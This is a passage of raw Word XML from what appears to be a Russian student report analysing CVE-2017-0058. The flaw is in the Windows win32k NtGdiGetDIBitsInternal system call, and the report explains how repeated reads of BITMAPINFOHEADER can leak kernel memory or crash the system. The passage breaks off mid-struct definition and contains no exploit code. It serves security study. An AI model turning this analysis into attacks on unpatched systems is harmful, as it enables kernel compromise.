        <w:t>од работы</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E6432D" w14:textId="099AA003" w:rsidR="002B3FB0" w:rsidRPr="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Анализ уязвимости</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04CF54CD" w14:textId="77777777" w:rsidR="00560759" w:rsidRDefault="00AE75AB" w:rsidP="0071777F">
      <w:r>
        <w:t xml:space="preserve">В соответствии с вариантом была получена уязвимость в реализации </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Microsoft</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kernel</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>—</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>'</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>win</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>32</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>sys</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r>
        <w:t>под названием</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Multiple</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> '</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NtGdiGetDIBitsInternal</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve">' </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>System</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Call</w:t>
      </w:r>
      <w:r>
        <w:t>. Идентификатор уязвимости</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>CVE</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>-2017-0058</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Идентификатор исправления </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>17-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>APR</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>KB</w:t>
      </w:r>
      <w:r w:rsidRPr="00AE75AB">
        <w:t>4015195)</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75FC2F86" w14:textId="73772547" w:rsidR="00AE75AB" w:rsidRDefault="0041676E" w:rsidP="0071777F">
      <w:r w:rsidRPr="0041676E">
        <w:t xml:space="preserve">Уязвимость раскрытия информации Win32k существует в Microsoft Windows, когда компонент win32k неправильно предоставляет информацию о ядре. Злоумышленник, успешно воспользовавшийся уязвимостью, может получить информацию для дальнейшей компрометации системы пользователя, известную как "Уязвимость раскрытия информации Win32k". </w:t>
      </w:r>
      <w:r w:rsidR="0071777F">
        <w:t>Ниже представлено описание уязвимости</w:t>
      </w:r>
      <w:r w:rsidR="0071777F" w:rsidRPr="0071777F">
        <w:t xml:space="preserve"> [1].</w:t>
      </w:r>
      <w:r w:rsidR="00881B20" w:rsidRPr="00881B20">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00881B20">
        <w:t>На Рисунке 1 можно видеть список всех версий ОС, которые оказались подвержены данной уязвимости.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CDE07F5" w14:textId="74EF7758" w:rsidR="00881B20" w:rsidRDefault="00881B20" w:rsidP="00881B20">
      <w:pPr>
        <w:pStyle w:val="af6"/>
      </w:pPr>
      <w:r w:rsidRPr="00881B20">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="17E4ED78" wp14:editId="4B41DC81">
            <wp:extent cx="5940425" cy="3024505"/>
            <wp:effectExtent l="0" t="0" r="3175" b="4445"/>
            <wp:docPr id="2" name="Рисунок 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стол&#10;&#10;Автоматически созданное описание"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5940425" cy="3024505"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C24FE6" w14:textId="7E841C14" w:rsidR="00881B20" w:rsidRPr="00881B20" w:rsidRDefault="00881B20" w:rsidP="00881B20">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:t>Рисунок 1 — Уязвимые версии</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C21497F" w14:textId="779C1E32" w:rsidR="00AE75AB" w:rsidRDefault="0071777F" w:rsidP="00AE75AB">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Было</w:t>
      </w:r>
      <w:r w:rsidR="00AE75AB">
        <w:t xml:space="preserve"> обнаруж</w:t>
      </w:r>
      <w:r>
        <w:t>ено</w:t>
      </w:r>
      <w:r w:rsidR="00AE75AB">
        <w:t xml:space="preserve"> две ошибки в реализации системного вызова win32k!NtGdiGetDIBitsInternal, который является частью графической подсистемы во всех современных версиях Windows. Эти проблемы потенциально могут привести к раскрытию памяти пула ядра (ошибка №1) или отказу в обслуживании (ошибки №1 и №2). При определенных обстоятельствах также возможно повреждение памяти.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3F5B27" w14:textId="1A828343" w:rsidR="002B3FB0" w:rsidRDefault="002B3FB0" w:rsidP="002B3FB0">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:r>
        <w:t>Многократное обращение к структуре</w:t>
      </w:r>
      <w:r w:rsidRPr="002B3FB0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75861E99" w14:textId="138B5C96" w:rsidR="0082663B" w:rsidRDefault="00AE75AB" w:rsidP="0082663B">
      <w:r>
        <w:t>В начале обработчика системного вызова win32k!NtGdiGetDIBitsInternal код несколько раз обращается к структуре BITMAPINFOHEADER (в частности, к ее полю .biSize), чтобы правильно вычислить ее размер и захватить в память режима ядра.</w:t>
      </w:r>
      <w:r w:rsidR="0082663B">
        <w:t xml:space="preserve"> Структура</w:t>
      </w:r>
      <w:r w:rsidR="003741FC" w:rsidRPr="003741FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082663B" w:rsidRPr="0082663B">
        <w:t>BITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidR="003741FC" w:rsidRPr="003741FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082663B">
        <w:t>содержит информацию о размерах и цветовом формате не зависящего от устройства растрового изображения (DIB). Эта структура также описана в документации GDI.</w:t>
      </w:r>
      <w:r w:rsidR="003741FC" w:rsidRPr="003741FC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082663B">
        <w:t>Однако семантика видеоданных немного отличается от семантики, используемой для GDI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3550D895" w14:textId="77777777" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>typedef</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="hljs-keyword"/>
        </w:rPr>
        <w:t>struct</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="hljs-class"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="hljs-title"/>
        </w:rPr>
        <w:t>tagBITMAPINFOHEADER</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="hljs-class"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79918F7C" w14:textId="461F38EA" w:rsidR="0082663B" w:rsidRPr="003741FC" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biSize</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Задает количество байтов, требуемое структурой.</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidRPr="003741FC">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Это значение не включает размер таблицы цветов или размер цветовых масок, если они добавлены в конец структуры.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="603A9390" w14:textId="58AB6C5D" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>LONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biWidth</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задает ширину растрового изображения в пикселях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423BDD8B" w14:textId="691613EC" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>LONG</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biHeight</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">; </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> Задает высоту растрового изображения в пикселях.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAEFC5C" w14:textId="04AF9961" w:rsidR="0082663B" w:rsidRPr="0075529D" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biPlanes</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задает количество плоскостей для целевого устройства.</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="0075529D">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Это значение должно быть равно 1.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D140741" w14:textId="5A892F32" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>WORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biBitCount</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>Задает количество бит на пиксель (</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
        </w:rPr>
        <w:t>bpp</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5466F412" w14:textId="410A631C" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>biCompression</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="003311E0" w:rsidRPr="00460D5E">
        <w:rPr>
          <w:color w:val="00B050"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">// Обозначает, является ли видео/фото сжатым, и степень сжатия </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAE3DDE" w14:textId="431C9713" w:rsidR="0082663B" w:rsidRPr="00460D5E" w:rsidRDefault="0082663B" w:rsidP="00460D5E">
      <w:pPr>
        <w:pStyle w:val="Courier"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>DWORD</w:t>
      </w:r>
      <w:r w:rsidRPr="00460D5E">
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
          <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cs="Times New Roman"/>
          <w:color w:val="0070C0"/>
          <w:lang w:val="ru-RU"/>
        </w:rPr>
